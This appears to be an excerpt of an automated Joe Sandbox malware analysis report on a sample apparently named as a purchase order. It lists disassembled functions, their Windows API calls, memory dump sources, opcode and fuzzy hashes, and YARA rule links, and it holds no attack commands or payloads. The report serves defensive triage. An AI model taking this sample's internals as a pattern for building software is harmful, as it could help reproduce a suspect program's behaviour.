                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateHandlePipe
                                • String ID: nul
                                • API String ID: 1424370930-2873401336
                                • Opcode ID: f6686247d817808ab471dd7bd956ee89a994200f721d1f5ca1d488c6ea65df39
                                • Instruction ID: b46ab60be6f027d9cb72d937c48068b8a0203cb22c03c77b3bffcc88db29af56
                                • Opcode Fuzzy Hash: f6686247d817808ab471dd7bd956ee89a994200f721d1f5ca1d488c6ea65df39
                                • Instruction Fuzzy Hash: 56217175500325DBDB219F698C44F9A77E4BFA9720F200A1DE9A1E72D0D770D8A1CB50
                                Function 001E40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0015600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0015604C
                                  • Part of subcall function 0015600E: GetStockObject.GDI32(00000011), ref: 00156060
                                  • Part of subcall function 0015600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0015606A
                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001E4112
                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001E411F
                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001E412A
                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001E4139
                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001E4145
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$CreateObjectStockWindow
                                • String ID: Msctls_Progress32
                                • API String ID: 1025951953-3636473452
                                • Opcode ID: 88281d5183de89c9579b2907bcb0cdaf2ec05bac6c18a2bbe1e285c695779c11
                                • Instruction ID: 3af6deb1c6b9e997a32f805ed98ea598e133ac3b3ad986c9a2aa0f468f19b244
                                • Opcode Fuzzy Hash: 88281d5183de89c9579b2907bcb0cdaf2ec05bac6c18a2bbe1e285c695779c11
                                • Instruction Fuzzy Hash: 5311E2B2140219BFEF108FA5CC85EEB7FADEF18798F014110BA18A6190C7729C61DBA0
                                Function 0018D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0018D7A3: _free.LIBCMT ref: 0018D7CC
                                • _free.LIBCMT ref: 0018D82D
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018D838
                                • _free.LIBCMT ref: 0018D843
                                • _free.LIBCMT ref: 0018D897
                                • _free.LIBCMT ref: 0018D8A2
                                • _free.LIBCMT ref: 0018D8AD
                                • _free.LIBCMT ref: 0018D8B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                • Instruction ID: 38369d7d34ce96af2da375efbfe2ed07394711bc4936eb74495af0a8db797c9b
                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                • Instruction Fuzzy Hash: 08112971940B14AAD622BFF0DC46FCB7B9CAF20704F400825F299A60D2DB79A6058B61
                                Function 001BDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001BDA74
                                • LoadStringW.USER32(00000000), ref: 001BDA7B
                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001BDA91
                                • LoadStringW.USER32(00000000), ref: 001BDA98
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001BDADC
                                Strings
                                • %s (%d) : ==> %s: %s %s, xrefs: 001BDAB9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message
                                • String ID: %s (%d) : ==> %s: %s %s
                                • API String ID: 4072794657-3128320259
                                • Opcode ID: e3c8d6bf6de33e032070eb1b0c6644fb44f5e2ebde7c211be519373dfb529808
                                • Instruction ID: 307d98c1b663cc4adc1a5832b386f99eec24c4ff6b4d9f4371b1c27d420e7ec3
                                • Opcode Fuzzy Hash: e3c8d6bf6de33e032070eb1b0c6644fb44f5e2ebde7c211be519373dfb529808
                                • Instruction Fuzzy Hash: F0014FF6900248BBEB109BE09D89EEB736CEB08301F400491F716E6041E7749EC58BB4
                                Function 001C096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(00E14678,00E14678), ref: 001C097B
                                • EnterCriticalSection.KERNEL32(00E14658,00000000), ref: 001C098D
                                • TerminateThread.KERNEL32(0000000E,000001F6), ref: 001C099B
                                • WaitForSingleObject.KERNEL32(0000000E,000003E8), ref: 001C09A9
                                • CloseHandle.KERNEL32(0000000E), ref: 001C09B8
                                • InterlockedExchange.KERNEL32(00E14678,000001F6), ref: 001C09C8
                                • LeaveCriticalSection.KERNEL32(00E14658), ref: 001C09CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 3495660284-0
                                • Opcode ID: 8c7c595000582326b13e72698e6cbc663c3232aa1937eb027db5723c46413683
                                • Instruction ID: 809dfcb7bcae9916308aae877948b78256cccded7a25d989e805f40c1b95000a
                                • Opcode Fuzzy Hash: 8c7c595000582326b13e72698e6cbc663c3232aa1937eb027db5723c46413683
                                • Instruction Fuzzy Hash: 06F0C932442A52EBD7525BA4EEC9BDABA29BF05706F402025F20298CA1C77595A6CFD0
                                Function 001801B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 001800BA
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001800D6
                                • __allrem.LIBCMT ref: 001800ED
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0018010B
                                • __allrem.LIBCMT ref: 00180122
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00180140
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                • Instruction ID: 8eb06c957246371daf8fd1cdcdf86d21b5240b5f5e0fa4e087c60e3c9423260f
                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                • Instruction Fuzzy Hash: 1D81F672600B0AABE725AE68CC41B6B73F8AF55374F24823EF415D6281EB70DA458F50
                                Function 001861FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001782D9,001782D9,?,?,?,0018644F,00000001,00000001,8BE85006), ref: 00186258
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0018644F,00000001,00000001,8BE85006,?,?,?), ref: 001862DE
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001863D8
                                • __freea.LIBCMT ref: 001863E5
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                • __freea.LIBCMT ref: 001863EE
                                • __freea.LIBCMT ref: 00186413
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                • String ID:
                                • API String ID: 1414292761-0
                                • Opcode ID: 3b728338001f96fdbd858df7ad3b8e3f30e12f9ea88e87cb2f77bbe62de9dd68
                                • Instruction ID: 1fd19a3a683dd90f9c3194d2452c255ec1e1fcf483ff6df57f1810c5a722df95
                                • Opcode Fuzzy Hash: 3b728338001f96fdbd858df7ad3b8e3f30e12f9ea88e87cb2f77bbe62de9dd68
                                • Instruction Fuzzy Hash: 2A51E372A00216ABEB25AF64DC81EBF77AAEB54710F154669FC09D6140EB34DE40CBA0
                                Function 001DBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001DB6AE,?,?), ref: 001DC9B5
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DC9F1
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA68
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA9E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DBCCA
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DBD25
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DBD6A
                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001DBD99
                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001DBDF3
                                • RegCloseKey.ADVAPI32(?), ref: 001DBDFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                • String ID:
                                • API String ID: 1120388591-0
                                • Opcode ID: 050bce1be141f913525cc232035b4080567231c1762d96d484611a9bfdf0612d
                                • Instruction ID: 42bde17ac3582255cd1b4549f87c6d3955c3115c7d467b7c781cb4737f9ff630
                                • Opcode Fuzzy Hash: 050bce1be141f913525cc232035b4080567231c1762d96d484611a9bfdf0612d
                                • Instruction Fuzzy Hash: 58815830218241EFD714DF64C8D5E2ABBE5BF84308F15895DF45A8B2A2DB31ED49CB92
                                Function 001AF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(00000035), ref: 001AF7B9
                                • SysAllocString.OLEAUT32(00000001), ref: 001AF860
                                • VariantCopy.OLEAUT32(001AFA64,00000000), ref: 001AF889
                                • VariantClear.OLEAUT32(001AFA64), ref: 001AF8AD
                                • VariantCopy.OLEAUT32(001AFA64,00000000), ref: 001AF8B1
                                • VariantClear.OLEAUT32(?), ref: 001AF8BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearCopy$AllocInitString
                                • String ID:
                                • API String ID: 3859894641-0
                                • Opcode ID: 29639964f086e58efda4a297fc128751532bd43d54314cddaacb354161cb7826
                                • Instruction ID: f1f7d82d9ffd6fe9d8fbcbf07cba01a9535c2d1ee1c0cf9bb178335d808c3762
                                • Opcode Fuzzy Hash: 29639964f086e58efda4a297fc128751532bd43d54314cddaacb354161cb7826
                                • Instruction Fuzzy Hash: EC51E639600310FACF24AFE5D895B2AB3A4EF56314F24846EF805DF292DB708C46C796
                                Function 001C910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • GetOpenFileNameW.COMDLG32(00000058), ref: 001C94E5
                                • _wcslen.LIBCMT ref: 001C9506
                                • _wcslen.LIBCMT ref: 001C952D
                                • GetSaveFileNameW.COMDLG32(00000058), ref: 001C9585
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$FileName$OpenSave
                                • String ID: X
                                • API String ID: 83654149-3081909835
                                • Opcode ID: cbb312f7593108624329e25aa1bb9360deed5419b9389c2a09b8697e0546b5bd
                                • Instruction ID: 37d7729b8ed6b7631e48bcc52184e210e9ec09c6ecc407711d5054586c10c067
                                • Opcode Fuzzy Hash: cbb312f7593108624329e25aa1bb9360deed5419b9389c2a09b8697e0546b5bd
                                • Instruction Fuzzy Hash: 78E17D31608340CFD724DF24D885F6AB7E4BFA5314F04896DE8999B2A2DB31ED05CB92
                                Function 0016920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • BeginPaint.USER32(?,?,?), ref: 00169241
                                • GetWindowRect.USER32(?,?), ref: 001692A5
                                • ScreenToClient.USER32(?,?), ref: 001692C2
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001692D3
                                • EndPaint.USER32(?,?,?,?,?), ref: 00169321
                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001A71EA
                                  • Part of subcall function 00169339: BeginPath.GDI32(00000000), ref: 00169357
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                • String ID:
                                • API String ID: 3050599898-0
                                • Opcode ID: ac00d48b234ae191ff4e56c95280cddfd7c12fccb12e865502c1375fbe6f4afd
                                • Instruction ID: e3f17082091fab33466ab6a96b2a2e448dee293f57cc5e4513a5d86994d9b1a0
                                • Opcode Fuzzy Hash: ac00d48b234ae191ff4e56c95280cddfd7c12fccb12e865502c1375fbe6f4afd
                                • Instruction Fuzzy Hash: 16419C70104340AFD721DF64DC98FBA7BF8EF6A320F040629F9958A2E1C7309996DB61
                                Function 001C07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 001C080C
                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001C0847
                                • EnterCriticalSection.KERNEL32(?), ref: 001C0863
                                • LeaveCriticalSection.KERNEL32(?), ref: 001C08DC
                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001C08F3
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 001C0921
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                • String ID:
                                • API String ID: 3368777196-0
                                • Opcode ID: 99173330282fccf7ec9f52e4cecd1e4375b5b3d5f84bf469c7cb8e7c09e4e43a
                                • Instruction ID: 40eefa7bc225ed5c3c96a4aef5b264e3deb351253f720c211d7a5a8b59bb16a6
                                • Opcode Fuzzy Hash: 99173330282fccf7ec9f52e4cecd1e4375b5b3d5f84bf469c7cb8e7c09e4e43a
                                • Instruction Fuzzy Hash: 5C415971900205EFDF15DF94DC85AAA7B78FF18304F1480A9ED049E296DB31DE61DBA0
                                Function 001E81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001AF3AB,00000000,?,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 001E824C
                                • EnableWindow.USER32(00000000,00000000), ref: 001E8272
                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001E82D1
                                • ShowWindow.USER32(00000000,00000004), ref: 001E82E5
                                • EnableWindow.USER32(00000000,00000001), ref: 001E830B
                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001E832F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Show$Enable$MessageSend
                                • String ID:
                                • API String ID: 642888154-0
                                • Opcode ID: 5f6f30066f2ed0836497ab1acaa18070f89960b560cc21f93387ad9b6bf64ce7
                                • Instruction ID: cca08732221f6631991a18f305139e08a607bd0108c0290c16858dab09530b92
                                • Opcode Fuzzy Hash: 5f6f30066f2ed0836497ab1acaa18070f89960b560cc21f93387ad9b6bf64ce7
                                • Instruction Fuzzy Hash: 8741B730601A85AFDB25CF56DC99FEC7BF1BB0A714F185165E60C5F262C7329892CB50
                                Function 001B4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 001B4C95
                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001B4CB2
                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001B4CEA
                                • _wcslen.LIBCMT ref: 001B4D08
                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001B4D10
                                • _wcsstr.LIBVCRUNTIME ref: 001B4D1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                • String ID:
                                • API String ID: 72514467-0
                                • Opcode ID: 04ced8e318dfe45b92a2658b9cd308c462ec9bf5cf8c61bd5dc1ee60fdcfa128
                                • Instruction ID: 742ff14f090db849000eaef8a71943afa85fa0da5945b6a5960d49622edf07c3
                                • Opcode Fuzzy Hash: 04ced8e318dfe45b92a2658b9cd308c462ec9bf5cf8c61bd5dc1ee60fdcfa128
                                • Instruction Fuzzy Hash: F821D7726042407BEB155B69AC49EBF7FA8DF59750F11C02DF805CA192DB61DC4196A0
                                Function 001C581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                • _wcslen.LIBCMT ref: 001C587B
                                • CoInitialize.OLE32(00000000), ref: 001C5995
                                • CoCreateInstance.OLE32(001EFCF8,00000000,00000001,001EFB68,?), ref: 001C59AE
                                • CoUninitialize.OLE32 ref: 001C59CC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                • String ID: .lnk
                                • API String ID: 3172280962-24824748
                                • Opcode ID: 63a2ac4eb045eee8d551f8bc96e8d1394cddc385fe33bbe81a88d39b485360d8
                                • Instruction ID: d60a67b7bd19b24fd414f12727999b67ecb328df10f6bf7501a01f0b5f8f4a22
                                • Opcode Fuzzy Hash: 63a2ac4eb045eee8d551f8bc96e8d1394cddc385fe33bbe81a88d39b485360d8
